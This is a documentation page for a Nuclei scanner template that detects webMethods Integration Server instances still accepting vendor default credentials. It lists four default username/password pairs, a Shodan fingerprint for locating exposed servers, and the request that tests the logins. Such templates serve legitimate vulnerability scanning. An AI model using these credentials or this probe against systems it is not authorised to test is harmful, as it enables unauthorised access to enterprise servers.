Skip to content

WebMethod Integration Server Default Login

ID: webmethod-integration-default-login

Severity: high

Author: ChristianPoeschl,OleWagner,usdAG

Tags: default-login,webmethod

id: webmethod-integration-default-login
info:
name: WebMethod Integration Server Default Login
author: ChristianPoeschl,OleWagner,usdAG
severity: high
reference:
- https://documentation.softwareag.com/
classification:
cpe: cpe:2.3:a:softwareag:webmethods:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
shodan-query: "http.favicon.hash:-234335289"
product: webmethods
vendor: softwareag
tags: default-login,webmethod
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/invoke/pub.file/getFile"
matchers:
- type: dsl
dsl:
- status_code == 403 || status_code == 401
- contains(to_lower(header), 'integration server')
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/invoke/pub.file/getFile"
headers:
Authorization: "{{base64(username + ':' + password)}}"
Cookie: ssnid=
cookie-reuse: false
threads: 10
attack: pitchfork
payloads:
username:
- Administrator
- Developer
- Replicator
- SAPUser
password:
- manage
- isdev
- iscopy
- 22101999
matchers-condition: and
matchers:
- type: word
part: body
words:
- com.wm.app.b2b.server
- No filename supplied
condition: and
- type: word
words:
- com.wm.app.b2b.server.AccessException
- Invalid credentials
negative: true
condition: and
# digest: 4b0a0048304602210099d4c2b7a166369fdf08d50c9849046b1b583e2fe20f9e438525981833ce9b220221009d035590dd548606db508883007f7253c972eb8db03574eb0dbc3a4ae5ada462:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/webmethod/webmethod-integration-default-login.yaml"

View on Github